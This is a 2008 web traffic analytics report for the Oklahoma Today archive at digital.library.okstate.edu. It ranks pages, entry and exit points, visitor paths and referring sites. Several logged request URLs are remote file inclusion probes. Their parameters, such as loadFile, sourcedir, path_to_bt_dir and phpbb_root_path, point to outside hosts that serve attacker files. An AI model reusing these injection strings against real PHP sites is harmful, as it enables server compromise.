12/oktoday/1950s/1959/1011710264
13/oktoday/1980s/1982/1001720158
14/oktoday/1960s/1961/978689243
15/oktoday/1950s/1957/943718833
16/oktoday/1960s/1967/942673381
17/oktoday/2000s/2005/932793880
18/oktoday/1980s/1984/926781368
19/oktoday/1960s/1965/884541875
20/oktoday/1960s/1962/873676400
21/oktoday/1970s/1977/843571397
22/oktoday/1980s/1986/832798557
23/oktoday/2000s/2004/825736887
24/oktoday/1970s/1974/807548455
25/oktoday/1970s/1979/783532007
26/oktoday/1950s/1958/764500251
27/oktoday/1960s/1968/721569617
28/oktoday/1990s/1999/720435361
29/oktoday/1960s/1960/712416596
30/oktoday/1970s/1972/682515987
31/oktoday/1970s/1973/676503574
32/oktoday/1970s/1975/646691212
33/oktoday/2000s/2001/631756118
34/oktoday/1990s/1990/628424035
35/oktoday/1960s/1963/577375930
36/oktoday/1970s/1976/568443841
37/oktoday/1960s/1966/567450195
38/oktoday/1970s/1970/563485403
39/oktoday/1990s/1996/555632163
40/oktoday/1960s/1969/549383842
41/oktoday/1990s/1995/545589801
42/oktoday/1980s/1985/527637947
43/oktoday/2000s/2000/523729450
44/oktoday/1990s/1992/498481909
45/oktoday/1970s/1971/494432616
46/oktoday/1990s/1991/482416914
47/oktoday/1970s/1978/438375010
48/oktoday/1990s/1998/408450630
49/oktoday/1980s/1989/406681266
50/oktoday/1990s/1994/327376971
51/oktoday/1990s/1993/311336628
52/oktoday/1980s/1987/235488373
53/oktoday/1990s/1997/227340691
54/oktoday/1960s/20
55/oktoday/1950s/20
56/oktoday/1990s/20
57/oktoday/1980s/20
58/oktoday/Site/images/misc/23
59/oktoday/Sources/Packages.php?sourcedir=http://www.mediumchannel.com/templates/11
60/oktoday/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[9 99][0][loadFile]=http://www.pokerchipplanet.com/.../11
61/oktoday/file:/C:/Program+Files/Microsoft+Office/OFFICE11/fpclass/11
62/oktoday/2000s/2004/Ste/11
63/oktoday/2000s/2005/oktdv55n3.pdfdigital.library.okstate.edu/oktoday/2000s/2005/ oktdv55n3.pdfdigital.library.okstate.edu/oktoday/2000s/2005/digital.library.okst ate.edu/oktoday/2000s/2005/11
64/oktoday/1950s/1953/11
65/oktoday/1980s/1983/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/ templates/11
66/oktoday/1980s/1983/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb _root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/11
67/oktoday/1980s/1986/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/ templates/11
68/oktoday/1960s/1969/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb _root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/11
69/oktoday/1970s/10
70/oktoday/2000s/2001/http~/11
71/oktoday/2000s/10
72/oktoday/1990s/1995/l/11
73/oktoday/1990s/1991/ho/vc/11
74/oktoday/1990s/1991/tliie/11
75/oktoday/1990s/1992/ofthe~eqrfmbottlesleftutthewi~~e1~~0~'/11

Top Entry Pages and Files
Rank# Page/File Count
1/oktoday/913
2/oktoday/index.html170
3/oktoday/1960.html95
4/oktoday/1970.html92
5/oktoday/1980.html83
6/oktoday/1990.html66
7/oktoday/1950.html62
8/oktoday/2000.html54
9/oktoday/?cat=1&feed=comments-rss23
10/oktoday/1990s/2
11/oktoday/1980s/1980/2
12/oktoday/1980s/2
13/oktoday/1950s/2
14/oktoday/1960s/2
15/oktoday/1950s/1958/2
16/oktoday/2000s/2000/1
17/oktoday/2000s/2001/1
18/oktoday/2000s/2004/1
19/oktoday/1990s/1999/1
20/oktoday/2000s/1
21/oktoday/1990s/1998/1
22/oktoday/protected.htm1
23/oktoday/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pokerchipplanet.com/.../test.txt???1
24/oktoday/1960s/1966/1
25/oktoday/Sources/Packages.php?sourcedir=http://www.mediumchannel.com/templates/test.txt??1
26/oktoday/1960s/1961/1
27/oktoday/1950s/1957/1
28/oktoday/1980s/1983/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/templates/test.txt??1
29/oktoday/1980s/1983/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??1
30/oktoday/1980s/1984/1
31/oktoday/1970s/1974/1
32/oktoday/1970s/1970/1
33/oktoday/1990s/1994/1
34/oktoday/1990s/1991/1
35/oktoday/1990s/1990/1
36/oktoday/1980s/1989/1
37/oktoday/1950s/1953/1
38/oktoday/1970s/1

Top Exit Pages and Files
Rank# Page/File Count
1/oktoday/803
2/oktoday/index.html155
3/oktoday/2000.html136
4/oktoday/1960.html109
5/oktoday/1970.html93
6/oktoday/1990.html81
7/oktoday/1950.html81
8/oktoday/1980.html76
9/oktoday/?cat=1&feed=comments-rss23
10/oktoday/1980s/2
11/oktoday/1980s/1980/2
12/oktoday/1950s/2
13/oktoday/1990s/2
14/oktoday/1960s/2
15/oktoday/1950s/1958/2
16/oktoday/2000s/2001/1
17/oktoday/2000s/2000/1
18/oktoday/2000s/2004/1
19/oktoday/2000s/2005/oktdv55n31
20/oktoday/1950s/1953/1
21/oktoday/2000s/1
22/oktoday/1990s/1999/1
23/oktoday/protected.htm1
24/oktoday/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pokerchipplanet.com/.../test.txt???1
25/oktoday/1960s/1966/1
26/oktoday/Sources/Packages.php?sourcedir=http://www.mediumchannel.com/templates/test.txt??1
27/oktoday/1960s/1961/1
28/oktoday/1970s/1974/1
29/oktoday/1980s/1986/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/templates/test.txt??1
30/oktoday/1980s/1984/1
31/oktoday/1980s/1989/1
32/oktoday/1970s/1970/1
33/oktoday/1970s/1
34/oktoday/1990s/1998/1
35/oktoday/1990s/1994/1
36/oktoday/1990s/1991/1
37/oktoday/1950s/1957/1
38/oktoday/1960s/1969/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??1
39/oktoday/1990s/1990/1

Most Path Throughs
Rank# Path Count Percentage%
1/oktoday/78951.03%
2/oktoday/index.html1378.86%
3/oktoday/1960.html865.56%
4/oktoday/1970.html825.30%
5/oktoday/1980.html684.40%
6/oktoday/->/oktoday/2000.html603.88%
7/oktoday/1990.html593.82%
8/oktoday/2000.html473.04%
9/oktoday/1950.html473.04%
10/oktoday/index.html->/oktoday/1950.html120.78%
11/oktoday/->/oktoday/1950.html110.71%
12/oktoday/1950.html->/oktoday/2000.html60.39%
13/oktoday/->/oktoday/1990.html60.39%
14/oktoday/->/oktoday/2000.html->/oktoday/index.html50.32%
15/oktoday/->/oktoday/1960.html40.26%
16/oktoday/1980.html->/oktoday/2000.html40.26%
17/oktoday/1990.html->/oktoday/1950.html40.26%
18/oktoday/->/oktoday/index.html30.19%
19/oktoday/index.html->/oktoday/1950.html->/oktoday/1960.html30.19%
20/oktoday/->/oktoday/2000.html->/oktoday/->/oktoday/2000.html30.19%
21/oktoday/1970.html->/oktoday/1950.html30.19%
22/oktoday/index.html->/oktoday/1990.html30.19%
23/oktoday/1960.html->/oktoday/1970.html30.19%
24/oktoday/1950.html->/oktoday/1960.html30.19%
25/oktoday/1950.html->/oktoday/1990.html30.19%
26/oktoday/1970.html->/oktoday/1960.html30.19%
27/oktoday/?cat=1&feed=comments-rss230.19%
28/oktoday/1960.html->/oktoday/1980.html20.13%
29/oktoday/->/oktoday/1950.html->/oktoday/index.html20.13%
30/oktoday/1980s/1980/20.13%
31/oktoday/1990s/20.13%
32/oktoday/->/oktoday/2000.html->/oktoday/20.13%
33/oktoday/1980s/20.13%
34/oktoday/1950s/1958/20.13%
35/oktoday/1990.html->/oktoday/1980.html20.13%
36/oktoday/index.html->/oktoday/1950.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/1980.html->/oktoday/1990.html->/oktoday/2000.html20.13%
37/oktoday/1980.html->/oktoday/index.html20.13%
38/oktoday/1980.html->/oktoday/1990.html20.13%
39/oktoday/index.html->/oktoday/2000.html20.13%
40/oktoday/1950s/20.13%
41/oktoday/1980.html->/oktoday/1970.html->/oktoday/index.html20.13%
42/oktoday/1960s/20.13%
43/oktoday/->/oktoday/2000.html->/oktoday/1970.html->/oktoday/1990.html20.13%
44/oktoday/1980s/1989/10.06%
45/oktoday/1950s/1957/10.06%
46/oktoday/2000.html->/oktoday/1970.html10.06%
47/oktoday/1990s/1999/10.06%
48/oktoday/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pokerchipplanet.com/.../test.txt???10.06%
49/oktoday/2000.html->/oktoday/1960.html10.06%
50/oktoday/1980s/1984/10.06%
51/oktoday/1990.html->/oktoday/2000.html10.06%
52/oktoday/2000s/2000/10.06%
53/oktoday/1970s/1970/10.06%
54/oktoday/2000.html->/oktoday/index.html10.06%
55/oktoday/2000s/2001/10.06%
56/oktoday/2000s/2004/10.06%
57/oktoday/Sources/Packages.php?sourcedir=http://www.mediumchannel.com/templates/test.txt??10.06%
58/oktoday/1950s/1953/10.06%
59/oktoday/1990s/1994/10.06%
60/oktoday/->/oktoday/1970.html10.06%
61/oktoday/1970s/10.06%
62/oktoday/1960s/1966/10.06%
63/oktoday/1990s/1991/10.06%
64/oktoday/protected.htm10.06%
65/oktoday/1990s/1990/10.06%
66/oktoday/2000s/10.06%
67/oktoday/1990s/1998/10.06%
68/oktoday/1960s/1961/10.06%
69/oktoday/1960.html->/oktoday/1950.html10.06%
70/oktoday/1960.html->/oktoday/2000.html10.06%
71/oktoday/1970s/1974/10.06%
72/oktoday/->/oktoday/1980.html->/oktoday/1970.html->/oktoday/1960.html->/oktoday/1950.html->/oktoday/1990.html->/oktoday/2000.html->/oktoday/10.06%
73/oktoday/1960.html->/oktoday/1990.html->/oktoday/1950.html->/oktoday/1980.html->/oktoday/2000.html10.06%
74/oktoday/2000.html->/oktoday/1950.html->/oktoday/1980.html->/oktoday/1990.html->/oktoday/1960.html10.06%
75/oktoday/->/oktoday/1950.html->/oktoday/->/oktoday/1950.html->/oktoday/1960.html10.06%
76/oktoday/index.html->/oktoday/1970.html->/oktoday/1960.html->/oktoday/1950.html10.06%
77/oktoday/index.html->/oktoday/1970.html->/oktoday/1950.html->/oktoday/1980.html->/oktoday/2000.html10.06%
78/oktoday/1970.html->/oktoday/1960.html->/oktoday/2000.html->/oktoday/1950.html->/oktoday/1990.html10.06%
79/oktoday/->/oktoday/1960s/1960/Springtlbhtar?.ny->/oktoday/2000s/2002/->/oktoday/2000s/2006/ow?bomatoday.com->/oktoday/2000s/2005/um?tim.com->/oktoday/10.06%
80/oktoday/->/oktoday/1970.html->/oktoday/1950.html->/oktoday/1960.html10.06%
81/oktoday/1960.html->/oktoday/1950.html->/oktoday/1980.html->/oktoday/index.html10.06%
82/oktoday/->/oktoday/1990.html->/oktoday/->/oktoday/2000.html10.06%
83/oktoday/index.html->/oktoday/->/oktoday/1950.html->/oktoday/1960.html10.06%
84/oktoday/2000.html->/oktoday/1980.html->/oktoday/1970.html->/oktoday/index.html10.06%
85/oktoday/2000.html->/oktoday/1970.html->/oktoday/index.html->/oktoday/1990.html10.06%
86/oktoday/->/oktoday/2000.html->/oktoday/index.html->/oktoday/2000.html10.06%
87/oktoday/->/oktoday/1950.html->/oktoday/2000.html->/oktoday/1990.html->/oktoday/1980.html->/oktoday/1970.html->/oktoday/1960.html->/oktoday/10.06%
88/oktoday/->/oktoday/1980.html->/oktoday/1960.html->/oktoday/1950.html->/oktoday/1970.html->/oktoday/1990.html->/oktoday/2000.html->/oktoday/10.06%
89/oktoday/->/oktoday/1960.html->/oktoday/1970.html->/oktoday/1980.html->/oktoday/1950.html->/oktoday/1990.html->/oktoday/2000.html->/oktoday/10.06%
90/oktoday/->/oktoday/1960.html->/oktoday/1950.html->/oktoday/1970.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/1950.html->/oktoday/1960.html10.06%
91/oktoday/->/oktoday/1980.html->/oktoday/1950.html->/oktoday/2000.html->/oktoday/1990.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/10.06%
92/oktoday/->/oktoday/1980.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/1950.html->/oktoday/1990.html->/oktoday/2000.html->/oktoday/10.06%
93/oktoday/1950.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/2000.html->/oktoday/1980.html->/oktoday/1990.html10.06%
94/oktoday/2000.html->/oktoday/1990.html->/oktoday/1980.html->/oktoday/1970.html->/oktoday/1960.html->/oktoday/1950.html10.06%
95/oktoday/index.html->/oktoday/1950.html->/oktoday/index.html->/oktoday/1960.html->/oktoday/index.html->/oktoday/2000.html10.06%
96/oktoday/1950.html->/oktoday/1970.html->/oktoday/1980.html->/oktoday/1990.html->/oktoday/1960.html->/oktoday/2000.html10.06%
97/oktoday/1980.html->/oktoday/1960.html->/oktoday/index.html->/oktoday/2000.html->/oktoday/1990.html->/oktoday/1970.html->/oktoday/1950.html10.06%
98/oktoday/->/oktoday/1950.html->/oktoday/1970.html->/oktoday/1980.html->/oktoday/1990.html->/oktoday/2000.html->/oktoday/1990.html10.06%
99/oktoday/->/oktoday/1950.html->/oktoday/1960.html->/oktoday/1970.html->/oktoday/1980.html->/oktoday/1990.html->/oktoday/2000.html10.06%
100/oktoday/index.html->/oktoday/10.06%
101/oktoday/->/oktoday/1950.html->/oktoday/1980.html10.06%
102/oktoday/->/oktoday/2000.html->/oktoday/1990.html10.06%
103/oktoday/->/oktoday/1950.html->/oktoday/1970.html10.06%
104/oktoday/->/oktoday/1950.html->/oktoday/1960.html10.06%
105/oktoday/->/oktoday/2000.html->/oktoday/2000s/2005/oktdv55n310.06%
106/oktoday/->/oktoday/2000.html->/oktoday/1980.html10.06%
107/oktoday/->/oktoday/1990.html->/oktoday/10.06%
108/oktoday/index.html->/oktoday/1970.html10.06%
109/oktoday/index.html->/oktoday/1980.html10.06%
110/oktoday/index.html->/oktoday/1960.html10.06%
111/oktoday/1980s/1983/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??->/oktoday/1960s/1969/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??10.06%
112/oktoday/1980s/1983/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/templates/test.txt??->/oktoday/1980s/1986/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/templates/test.txt??10.06%
113/oktoday/1980.html->/oktoday/10.06%
114/oktoday/->/oktoday/2000.html->/oktoday/index.html->/oktoday/10.06%
115/oktoday/1980.html->/oktoday/2000.html->/oktoday/index.html10.06%
116/oktoday/1980.html->/oktoday/2000.html->/oktoday/1980.html10.06%
117/oktoday/1980.html->/oktoday/2000.html->/oktoday/1970.html10.06%
118/oktoday/index.html->/oktoday/1980.html->/oktoday/1990.html10.06%
119/oktoday/->/oktoday/2000.html->/oktoday/1950.html->/oktoday/10.06%
120/oktoday/->/oktoday/1950.html->/oktoday/1960.html->/oktoday/1970.html10.06%
121/oktoday/->/oktoday/1970.html->/oktoday/1960.html10.06%
122/oktoday/1970.html->/oktoday/1960.html->/oktoday/1970.html10.06%
123/oktoday/1970.html->/oktoday/1950.html->/oktoday/1960.html10.06%
124/oktoday/1950.html->/oktoday/1980.html->/oktoday/2000.html10.06%
125/oktoday/index.html->/oktoday/1990.html->/oktoday/2000.html10.06%
126/oktoday/index.html->/oktoday/->/oktoday/2000.html10.06%
127/oktoday/1970.html->/oktoday/index.html->/oktoday/1970.html10.06%

Powered by 123LogAnalyzer

123 Log Analyzer report

123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:50 2008
Domain Name: digital.library.okstate.edu/oktoday

Time Period:01/Mar/2008:06:02:27 - 01/Mar/2008:06:02:27 total 32 day(s)
Top Referring Domains

Most linked domains
Rank# Domain Hits
1No Referrer39730
2digital.library.okstate.edu8376
3google.com1793
4libgooglem.library.okstate.edu830
5oklahomatoday.com108
6aolsearch.aol.com85
764.233.167.10434
864.233.169.10433
9google.co.uk30
10google.ca29
11google.cn28
12soso.com23
13googlesyndicatedsearch.com21
14search.yahoo.com20
15google.com.tr17
16google.com.pk17
17google.de15
18search.aol.com14
19google.fr13
20google.com.au13
21library.okstate.edu13
22google.co.in11
23search.comcast.net10
24search.live.com9
25search.hp.netscape.com9
26en.wikipedia.org8
27aim.search.aol.com7
28google.com.mx7
29search.peoplepc.com7
30google.pl7
31google.nl7
32search.msn.com7
33my.att.net6
34google.co.th6
35search.earthlink.net6
36oklahomacity.cox.net6
37okiedoke.com5
38google.it5
39google.com.eg5
40google.com.vn5
41google.ch5
42images.google.com5
43google.es5
44cinematreasures.org5
45dogpile.com5
46search.myway.com5
47verden.abcsok.no5
48adobe.com4
49tulsa.cox.net4
50webferret.search.com4
51google.com.br4
52google.pt4
53google.com.my4
54eufaulalake.com4
55destiny14
56dummyurl.com4
57google.co.id4
58failedbandsofoklahoma.blogspot.com4
59ww.oklahomatoday.com3
60blingo.com3
61209.85.175.1043
62google.dk3
63search.conduit.com3
64search.netscape.com3
65google.com.ar3
66google.jo2
67www5.google.com2
68google.hu2
69google.ie2
70whogaveit.com2
71sads.myspace.com2
72search.hp.my.aol.com2
73search.daum.net2
74search.icq.com2
75scroogle.org2
76search.alot.com2
77google.no2
78usagold.com2
79google.ro2
80google.ru2
81search1.seznam.cz2
82startgoogle.startpagina.nl2
83209.85.165.1042
84google.co.ve2
85google.co.za2
86aolsearch.aol.co.uk2
87google.com.hk2
88ask.com2
89google.cl2
90google.bg2
91google.co.cr2
92arcade.verizon.net2
93charter.net2
94google.com.sg2
95cattailtradingpost.com2
96209.85.173.1042
97search.virginmedia.com1
98search.hp.my.aol.co.uk1
99search.sweetim.com1
100search.windstream.net1
101digitalcamguide.blogspot.com1
102busca.igbusca.com.br1
103bocn.co.uk1
104bibpurl.oclc.org1
105search.isp.netscape.com1
106as.starware.com1
107centralkansas.cox.net1
108ascx.com1
109search.hp.my.aol.fr1
110embarqmail.com1
111webcrawler.com1
112verizon.net1
113adelphia.net1
114altavista.com1
115americandinermuseum.org1
116209.85.207.1041
117websearch.cs.com1
11872.14.253.1041
119aolsearcht7.search.aol.com1
120southeastkansas.cox.net1
121shelbyvilledailyunion.com1
122aolsearch.aol.ca1
123search11.info.com1
124us.f837.mail.yahoo.com1
125tulsatopics.com1
126trazilica.tportal.hr1
127answers.com1
128google.fi1
129google.com.np1
130google.com.om1
131google.com.ng1
132google.com.pe1
133google.lv1
134images.google.com.pr1
135google.co.ma1
136google.se1
137google.si1
138google.co.jp1
139google.hr1
140google.gr1
141google.com.uy1
142google.cz1
143google.lt1
144google.la1
145google.com.sa1
146google.com.ph1
147farminfo.org1
148search.alice.it1
149google.am1
150google.ae1
151scirus.com1
152google.at1
153search.com1
154search.aol.co.uk1
155g.s.scandoo.com1
156muskogeephoenix.com1
157google.be1
158okcimc.com1
159google.az1
160northeastkansas.cox.net1
161rsulibeps.rsu.edu1
162query.nytimes.com1
163optimum.net1
164pipl.com1

Top Referring URLs
Rank# URL Hits
1No Referrer39730
2http://digital.library.okstate.edu/oktoday/2000.html1837
3http://digital.library.okstate.edu/oktoday/1950.html1183
4http://digital.library.okstate.edu/oktoday/1132
5http://digital.library.okstate.edu/oktoday/1970.html1076
6http://digital.library.okstate.edu/oktoday/1960.html899
7http://digital.library.okstate.edu/oktoday/1990.html832
8http://digital.library.okstate.edu/oktoday/1980.html809
9http://digital.library.okstate.edu/oktoday/index.html453
10http://www.oklahomatoday.com/80
11http://libgooglem.library.okstate.edu/search?q=Neoclassic&site=EPC&btnG=EPC+S...46
12http://digital.library.okstate.edu/45
13http://digital.library.okstate.edu/oktoday/1990s/199534
14http://64.233.169.104/search?q=cache:SpqgXW29xKwJ:digital.library.okstate.edu...30
15http://digital.library.okstate.edu/oktoday/1950s/1959/27
16http://www.google.cn/search?q=+FIXTURE+%26+FURNISHING+PLAN+luxury+SPA+pdf&com...25
17http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...22
18http://digital.library.okstate.edu/oktoday/1960s/1964/21
19http://www.oklahomatoday.com/index.aspx17
20http://www.google.com.pk/search?hl=en&q=hollybood+tunn+faree+sax+movies&meta=...17
21http://libgooglem.library.okstate.edu/search?q=cache:BTuVB9nf-JUJ:digital.lib...16
22http://64.233.167.104/search?q=cache:-x-MGyPBl8oJ:digital.library.okstate.edu...15
23http://64.233.167.104/search?q=cache:SpqgXW29xKwJ:digital.library.okstate.edu...15
24unknown14
25http://libgooglem.library.okstate.edu/search?q=playboy&site=EPC&btnG=EPC+Sear...14
26http://www.soso.com/q?w=juet%20one%20last%20dance&lr=&sc=web&ch=w.p&filter=1&...13
27http://libgooglem.library.okstate.edu/search?q=roller+die+drawing&site=EPC&bt...13
28http://www.library.okstate.edu/news/spring07/oktoday.htm13
29http://libgooglem.library.okstate.edu/search?q=Wampanoag&site=EPC&btnG=EPC+Se...11
30http://libgooglem.library.okstate.edu/search?q=quotient+set%2C+quotient+group...11
31http://oklahomatoday.com/10
32http://libgooglem.library.okstate.edu/search?q=black+mesa&site=OKToday&sort=d...8
33http://www.google.com/search?hl=en&q=dino+bones+in+the+panhandle7
34http://libgooglem.library.okstate.edu/search?q=vince+gill&site=OKToday&btnG=S...7
35http://digital.library.okstate.edu/oktoday/2000s/20066
36http://libgooglem.library.okstate.edu/search?q=koun-toupis&site=EPC&sort=date...6
37http://libgooglem.library.okstate.edu/search?q=carlberg&site=EPC&btnG=EPC+Sea...6
38http://www.soso.com/q?w=MY%20LOYE%20WILLGET%20YO&lr=&sc=web&ch=w.p&filter=1&n...5
39http://www.soso.com/q?w=MY%20LOYE%20WILLGET%20YO&lr=&sc=web&ch=w.p&filter=1&n...5
40http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...5
41http://libgooglem.library.okstate.edu/search?q=may+2007&site=OKToday&sort=dat...5
42http://www.google.com/search?hl=en&q=brantly+helicopters+owners+club5
43http://libgooglem.library.okstate.edu/search?q=2005&site=OKToday&btnG=EPC+Sea...5
44http://www.google.com/5
45http://www.google.com.vn/search?hl=vi&q=czech+festival%2C+celebrated+Czechosl...5
46http://cinematreasures.org/theater/367/4
47http://libgooglem.library.okstate.edu/search?q=%22Medicine+Park%22&site=OKTod...4
48http://libgooglem.library.okstate.edu/search?q=java&site=EPC&btnG=EPC+Search&...4
49http://libgooglem.library.okstate.edu/search?q=Jacques+Hans+Gallrein+&site=EP...4
50http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...4
51http://www.adobe.com/products/acrobat/readstep2.html4
52http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...4
53http://www.google.com.tr/search?q=w+w+w.marvel+.com&hl=tr&start=10&sa=N4
54http://www.eufaulalake.com/maillist.html4
55http://www.dummyurl.com/referer.htm4
56http://oklahomacity.cox.net/cci/google4
57http://search.peoplepc.com/search?area=earthlink-peoplepc-wssynd&cgid=176&mem...4
58http://en.wikipedia.org/wiki/Heavener_Runestone4
59http://www.google.com/search?hl=en&newwindow=1&safe=off&q=hale+camp+reservoir...4
60http://failedbandsofoklahoma.blogspot.com/2007/05/fbo-hominy-indians-world-ch...4
61http://en.wikipedia.org/wiki/Otto_Gray_and_his_Oklahoma_Cowboys4
62http://libgooglem.library.okstate.edu/search?q=1950+oklahoma+today+magazine&s...4
63http://www.google.com/search?q=scary+stories+of+Stilwell+Oklahoma&hl=en&rlz=1...4
64http://www.google.com/search?q=floyd+cunningham+ponca+indian&rls=com.microsof...4
65http://www.google.com/search?q=antique+1938+drill+rig&hl=en&start=80&sa=N4
66http://www.google.com/search?hl=en&q=Katherine+Coombes+painting3
67http://libgooglem.library.okstate.edu/search?q=list+of+antique+shops&site=OKT...3
68http://www.google.com/search?hl=en&q=Jimalee+Sowell&btnG=Google+Search3
69http://libgooglem.library.okstate.edu/search?q=hidden+loot&site=EPC&sort=date...3
70http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBR_enUS257U...3
71http://libgooglem.library.okstate.edu/search?q=place+to+stay+wilburton+oklaho...3
72http://www.google.com/search?q=infomation+about+oklahoma+grass&hl=en&safe=act...3
73http://libgooglem.library.okstate.edu/search?q=oklahoma+wineries&site=OKToday...3
74http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla:en-US:off...3
75http://www.google.com/search?hl=en&q=deer+creel%2Coklahoma&btnG=Google+Search...3
76http://www.google.com/search?q=WARREN+G.+(Freckles)+BROWN&hl=en&rls=com.micro...3
77http://www.google.com/search?q=Wagon+Boss%2C+1909%3B+Tulsa%2C+OK%2C+Gilcrease...3
78http://www.google.com/search?hl=en&q=hogshooter+osage3
79http://digital.library.okstate.edu/index.htm3
80http://digital.library.okstate.edu/encyclopedia/entries/R/RO026.html3
81http://digital.library.okstate.edu3
82http://digital.library.okstate.edu/encyclopedia/entries/B/BA017.html3
83http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AS%3Ad1&...3
84http://www.google.com.mx/search?q=if8+field+wagon&btnG=Buscar&gbv=2&hl=es3
85http://www.google.com.tr/search?hl=tr&q=present++perfeet++tense&btnG=Ara&meta...3
86http://www.google.com.au/3
87http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...3
88http://www.google.com/search?q=old+criminal+police+cases+from+the+year+1968+i...3
89http://ww.oklahomatoday.com/3
90http://tulsa.cox.net/cci/google3
91http://www.google.ch/search?hl=de&q=+site:digital.library.okstate.edu+Martin+...3
92http://search.peoplepc.com/search?q=old+huckins+hotel+okla+city+ok&start=20&a...3
93http://libgooglem.library.okstate.edu/search?q=recycling+in+oklahoma&site=EPC...3
94http://www.google.com/hws/search?hl=en&client=dell-usuk&channel=us-psp&ibd=10...3
95http://libgooglem.library.okstate.edu/search?q=saving+energy&site=EPC&sort=da...3
96http://libgooglem.library.okstate.edu/search?q=turner+falls&site=OKToday&btnG...3
97http://libgooglem.library.okstate.edu/search?q=sand+plums&site=OKToday&btnG=E...3
98http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...3
99http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...3
100http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...3
101http://libgooglem.library.okstate.edu/search?q=washing+Vegetables&site=EPC&bt...3
102http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS256&q=ruby+darby...3
103http://libgooglem.library.okstate.edu/search?q=Winding+Stair+National+Recreat...3
104http://209.85.175.104/search?q=cache:NatEYZvi5F8J:digital.library.okstate.edu...3
105http://www.google.com/search?q=%22Oscar+Monrad%22&rls=com.microsoft:*:IE-Sear...3
106http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=wh...3
107http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...3
108http://www.google.com/search?num=20&hl=en&safe=off&q=+clifton+early+spanish+p...3
109http://aolsearch.aol.com/aol/search?query=grandma%27s+biscuits+old+plantation...3
110http://www.google.com/search?hl=en&safe=active&q=what+does+crow+poison+look+l...3
111http://www.google.com/search?q=Pennsylvania+Chamber+Symphony+Frank+Collura&hl...3
112http://libgooglem.library.okstate.edu/search?q=1964&site=OKToday&sort=date%3A...3
113http://libgooglem.library.okstate.edu/search?q=SME+Training&site=EPC&btnG=EPC...3
114http://www.google.com/search?hl=en&q=roman+jasinski&btnG=Google+Search3
115http://libgooglem.library.okstate.edu/search?q=%22bennett+griffin%22&site=EPC...3
116http://www.usagold.com/cpmforum/archives/5199911/default.html2
117http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-0...2
118http://libgooglem.library.okstate.edu/search?q=which+the+capital+of+Oklahoma%...2
119http://libgooglem.library.okstate.edu/search?q=I+need+the+map+de+City+of+Okla...2
120http://libgooglem.library.okstate.edu/search?q=Feedback+principle+application...2
121http://libgooglem.library.okstate.edu/search?q=DECEMBER+1955&site=OKToday&btn...2
122http://libgooglem.library.okstate.edu/search?q=stillwater+friendliest&site=OK...2
123http://libgooglem.library.okstate.edu/search?q=state+bird&site=OKToday&btnG=S...2
124http://libgooglem.library.okstate.edu/search?q=top+high+schools+in+the+state+...2
125http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=HPID,HPID:2006-3...2
126http://libgooglem.library.okstate.edu/search?q=sapphire&site=EPC&output=xml_n...2
127http://libgooglem.library.okstate.edu/search?q=used+by+CCC+in+Murray+to+build...2
128http://libgooglem.library.okstate.edu/search?q=treasures&site=EPC&btnG=EPC+Se...2
129http://libgooglem.library.okstate.edu/search?q=treasure+NEXT+Chimney+rock&sit...2
130http://libgooglem.library.okstate.edu/search?q=Jim+Shoulders&site=EPC&sort=da...2
131http://libgooglem.library.okstate.edu/search?q=treasure&site=EPC&btnG=EPC+Sea...2
132http://libgooglem.library.okstate.edu/search?q=recycling+info&site=EPC&sort=d...2
133http://search.live.com/results.aspx?FORM=DNSAS&q=www.digital.library.okstate....2
134http://libgooglem.library.okstate.edu/search?q=Buck+Garrett&site=EPC&sort=dat...2
135http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GGLD,GGLD:2...2
136http://search.hp.netscape.com/hp/search?query=Fred+Shellabarger&page=2&offset...2
137http://search.hp.netscape.com/hp/search?query=tomahawk+plains+indians+buyers&...2
